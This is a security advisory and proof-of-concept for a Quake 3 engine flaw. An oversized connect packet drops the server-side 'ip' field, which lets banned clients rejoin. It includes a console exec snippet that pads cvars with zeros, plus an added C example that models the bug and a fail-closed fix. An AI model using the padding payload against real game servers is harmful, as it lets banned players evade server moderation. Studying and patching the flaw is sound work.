// Banned clients can join the servers which use the Quake 3 engine 0.1
// bug originally found by Richard Stanway in Feb 2007 (rev 1043) but
// unfortunately the ioquake3 executables are not updated and no
// advisory was released so I casually "re-found" the same bug some
// days ago
// by Luigi Auriemma
// e-mail: aluigi@autistici.org
// web:    aluigi.org
//
// the clients which use the Quake 3 engine and have been banned by the
// server can still join simply using a connect packet of 1024
// (MAX_INFO_STRING) chars.
//
// The problem happens since the SV_DirectConnect can't add other stuff to
// the client's data over MAX_INFO_STRING bytes and so when ClientConnect
// checks if "ip" is banned it fails because there is no "ip" field in the
// string or it's partial.
//
// NOTE that this proof-of-concept is not ready to work, you must tune the
// number of chars here or just find another better cvar to modify or just
// give up if the latest cvars of the "connect" command cannot be modified.
// q3tms and q3huffdecenc can be useful during the tests // // Execute: /exec q3unban set cl_anonymous 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 //setu unban 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
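
// Added example, not part of the original proof-of-concept and not ioquake3
// code: a server-side model of the missing "ip" field described above, next to
// one way to fail closed. The function names, the sample address and the
// simplified "\key\value" handling are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>
#define MAX_INFO_STRING 1024            /* size named in the advisory */

/* Models the described behaviour: when the "ip" pair does not fit it is
 * silently dropped and the connection still goes ahead. */
static int append_ip_unchecked(char *userinfo, const char *ip)
{
    if (strlen(userinfo) + strlen("\\ip\\") + strlen(ip) < MAX_INFO_STRING) {
        strcat(userinfo, "\\ip\\");
        strcat(userinfo, ip);
    }
    return 1;                           /* always accepted */
}

/* Hardened variant (assumed fix): a userinfo that leaves no room for the
 * server-side "ip" pair is refused before any ban check runs. */
static int append_ip_checked(char *userinfo, const char *ip)
{
    if (strlen(userinfo) + strlen("\\ip\\") + strlen(ip) >= MAX_INFO_STRING)
        return 0;                       /* reject the connect request */
    strcat(userinfo, "\\ip\\");
    strcat(userinfo, ip);
    return 1;
}

/* Stand-in for the game-side ban check: it only sees the trailing "ip" field. */
static int is_banned(const char *userinfo, const char *banned_ip)
{
    const char *p = strstr(userinfo, "\\ip\\");
    return p != NULL && strcmp(p + 4, banned_ip) == 0;
}

/* Constructed input: "\name\" followed by padding, len chars in total. */
static void make_userinfo(char *buf, size_t len)
{
    memset(buf, '0', len);
    memcpy(buf, "\\name\\", 6);
    buf[len] = '\0';
}

int main(void)
{
    char u[MAX_INFO_STRING];
    make_userinfo(u, MAX_INFO_STRING - 1);
    int ok = append_ip_unchecked(u, "192.0.2.7");
    printf("unchecked: accepted=%d banned=%d\n", ok, is_banned(u, "192.0.2.7"));
    make_userinfo(u, MAX_INFO_STRING - 1);
    printf("checked:   accepted=%d\n", append_ip_checked(u, "192.0.2.7"));
    return 0;
}
```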